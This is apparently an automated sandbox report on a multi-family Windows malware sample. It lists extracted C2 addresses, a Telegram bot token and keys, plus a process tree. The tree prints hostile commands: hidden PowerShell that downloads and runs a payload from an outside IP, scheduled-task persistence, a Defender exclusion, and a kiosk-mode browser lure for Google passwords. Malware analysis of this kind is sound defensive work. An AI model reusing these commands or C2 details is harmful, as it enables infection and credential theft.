Overview

overview

10

Static

static

5

c1a431d9ee...67.exe

windows7-x64

10

c1a431d9ee...67.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    146s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 17:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe

  • Size

    938KB

  • MD5

    49b60f16af6a6028755c86cad74bb4ee

  • SHA1

    a94d538bebbbcf138c9116f5201009ae14d9c773

  • SHA256

    c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67

  • SHA512

    dd120b906b034e837c1ede550f5b6d9afdb045ba50aef3cff87473cccd96b51827b2477e3fcb1b8658c5926adb2deaa0f26706dc30f97a6b9fb841f46ff2d314

  • SSDEEP

    24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8a0su:VTvC/MTQYxsWR7a0s

Score
10/10
amadeygcleanerhealerlitehttpphemedronestealc092155trumpbotcredential_accessdefense_evasiondiscoverydropperevasionexecutionloaderpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot8073216408:AAGdXWcCmxBIngZx-Z502Gat9NRWpLvPTxU/sendDocument

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

    stealerbotlitehttp
  • Litehttp family
    litehttp
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Phemedrone

    An information and wallet stealer written in C#.

    stealerphemedrone
  • Phemedrone family
    phemedrone
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
    defense_evasion
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 18 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 7 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 48 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
    defense_evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe
    "C:\Users\Admin\AppData\Local\Temp\c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2344
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn sAVWimaZmA8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\5O6m4Aci3.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2348
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn sAVWimaZmA8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\5O6m4Aci3.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:796
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\5O6m4Aci3.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2384
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'N0YLF0SZTWBIWIIVCTXBO8R82X2LF9HZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2096
        • C:\Users\Admin\AppData\Local\TempN0YLF0SZTWBIWIIVCTXBO8R82X2LF9HZ.EXE
          "C:\Users\Admin\AppData\Local\TempN0YLF0SZTWBIWIIVCTXBO8R82X2LF9HZ.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2668
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2148
            • C:\Users\Admin\AppData\Local\Temp\10104610101\25a04a2d7b.exe
              "C:\Users\Admin\AppData\Local\Temp\10104610101\25a04a2d7b.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2976
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn kvv9mman2mc /tr "mshta C:\Users\Admin\AppData\Local\Temp\eBj8pOrnF.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2760
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn kvv9mman2mc /tr "mshta C:\Users\Admin\AppData\Local\Temp\eBj8pOrnF.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:2616
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\eBj8pOrnF.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:2036
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LSYPCZ2N86F9OP1FNDNCAIWRH73F60AZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2536
                  • C:\Users\Admin\AppData\Local\TempLSYPCZ2N86F9OP1FNDNCAIWRH73F60AZ.EXE
                    "C:\Users\Admin\AppData\Local\TempLSYPCZ2N86F9OP1FNDNCAIWRH73F60AZ.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1880
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1788
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:1908
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2380
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1972
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2292
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1912
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1496
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1532
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "hAJ9Vma2nNM" /tr "mshta \"C:\Temp\BvIzlcQOD.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:796
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\BvIzlcQOD.hta"
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:2076
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:876
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2836
            • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
              "C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:3020
              • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
                "C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2824
                • C:\Users\Admin\AppData\Roaming\qZLzlyV9Ne.exe
                  "C:\Users\Admin\AppData\Roaming\qZLzlyV9Ne.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:1392
                • C:\Users\Admin\AppData\Roaming\udorB5ZSMp.exe
                  "C:\Users\Admin\AppData\Roaming\udorB5ZSMp.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1960
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 1960 -s 1572
                    9⤵
                      PID:2584
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 504
                  7⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:2704
              • C:\Users\Admin\AppData\Local\Temp\10104850101\fd91aeb028.exe
                "C:\Users\Admin\AppData\Local\Temp\10104850101\fd91aeb028.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:680
                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                  7⤵
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:644
              • C:\Users\Admin\AppData\Local\Temp\10104860101\141c83b051.exe
                "C:\Users\Admin\AppData\Local\Temp\10104860101\141c83b051.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2764
                • C:\Users\Admin\AppData\Local\Temp\10104860101\141c83b051.exe
                  "C:\Users\Admin\AppData\Local\Temp\10104860101\141c83b051.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2888
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 1016
                    8⤵
                    • Loads dropped DLL
                    • Program crash
                    PID:2672
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 508
                  7⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:2896
              • C:\Users\Admin\AppData\Local\Temp\10104870101\e81eff42e0.exe
                "C:\Users\Admin\AppData\Local\Temp\10104870101\e81eff42e0.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2168
                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                  7⤵
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:1612
              • C:\Users\Admin\AppData\Local\Temp\10104880101\fc259c3d14.exe
                "C:\Users\Admin\AppData\Local\Temp\10104880101\fc259c3d14.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                PID:988
              • C:\Users\Admin\AppData\Local\Temp\10104890101\23401e2b1c.exe
                "C:\Users\Admin\AppData\Local\Temp\10104890101\23401e2b1c.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                • Suspicious behavior: EnumeratesProcesses
                PID:2396
              • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
                "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
                6⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2804
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\XEUO4NQk\Anubis.exe""
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2568
              • C:\Users\Admin\AppData\Local\Temp\10104920101\7c161f386c.exe
                "C:\Users\Admin\AppData\Local\Temp\10104920101\7c161f386c.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1144
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1144 -s 1200
                  7⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:1428
              • C:\Users\Admin\AppData\Local\Temp\10104930101\590fcbc813.exe
                "C:\Users\Admin\AppData\Local\Temp\10104930101\590fcbc813.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2360
              • C:\Users\Admin\AppData\Local\Temp\10104940101\63af54f7b0.exe
                "C:\Users\Admin\AppData\Local\Temp\10104940101\63af54f7b0.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:3044
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM firefox.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2752
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM chrome.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:980
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM msedge.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2660
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM opera.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2108
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM brave.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:916
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                  7⤵
                    PID:1476
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                      8⤵
                      • Checks processor information in registry
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:1400
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1400.0.774406854\1729853529" -parentBuildID 20221007134813 -prefsHandle 1240 -prefMapHandle 1232 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7fc0e4fa-dcaf-406f-83e2-ddee0a41c579} 1400 "\\.\pipe\gecko-crash-server-pipe.1400" 1304 46dc258 gpu
                        9⤵
                          PID:2272
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1400.1.1064916960\1395006354" -parentBuildID 20221007134813 -prefsHandle 1512 -prefMapHandle 1508 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {da23025b-9961-410e-bba8-1d1735635109} 1400 "\\.\pipe\gecko-crash-server-pipe.1400" 1524 e74858 socket
                          9⤵
                            PID:1296
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1400.2.992739134\1381159945" -childID 1 -isForBrowser -prefsHandle 2056 -prefMapHandle 2052 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0cb9543-4c93-4e87-b7db-dd98f54a8a4d} 1400 "\\.\pipe\gecko-crash-server-pipe.1400" 2068 1a3a5058 tab
                            9⤵
                              PID:628
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1400.3.2069943271\1619798141" -childID 2 -isForBrowser -prefsHandle 2904 -prefMapHandle 2900 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0ac47d9-abfd-44a1-a201-374235ae52d5} 1400 "\\.\pipe\gecko-crash-server-pipe.1400" 2916 1b0f9958 tab
                              9⤵
                                PID:2348
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1400.4.2133646382\731071909" -childID 3 -isForBrowser -prefsHandle 3648 -prefMapHandle 2684 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bda12876-a2b7-45d3-8bb2-443796616aa2} 1400 "\\.\pipe\gecko-crash-server-pipe.1400" 3676 1f570658 tab
                                9⤵
                                  PID:2504
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1400.5.126285588\838086408" -childID 4 -isForBrowser -prefsHandle 3800 -prefMapHandle 3804 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf03fd81-89c5-4c5a-b980-83eda306b942} 1400 "\\.\pipe\gecko-crash-server-pipe.1400" 3788 1f571b58 tab
                                  9⤵
                                    PID:2600
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1400.6.2094796341\147379502" -childID 5 -isForBrowser -prefsHandle 3964 -prefMapHandle 3968 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8589d181-157b-4616-bbd5-2e68db8d1b92} 1400 "\\.\pipe\gecko-crash-server-pipe.1400" 3952 1f949558 tab
                                    9⤵
                                      PID:108
                              • C:\Users\Admin\AppData\Local\Temp\10104950101\90076af2a4.exe
                                "C:\Users\Admin\AppData\Local\Temp\10104950101\90076af2a4.exe"
                                6⤵
                                • Modifies Windows Defender DisableAntiSpyware settings
                                • Modifies Windows Defender Real-time Protection settings
                                • Modifies Windows Defender TamperProtection settings
                                • Modifies Windows Defender notification settings
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Windows security modification
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2284
                              • C:\Users\Admin\AppData\Local\Temp\10104960101\joblam.exe
                                "C:\Users\Admin\AppData\Local\Temp\10104960101\joblam.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:3372
                              • C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe
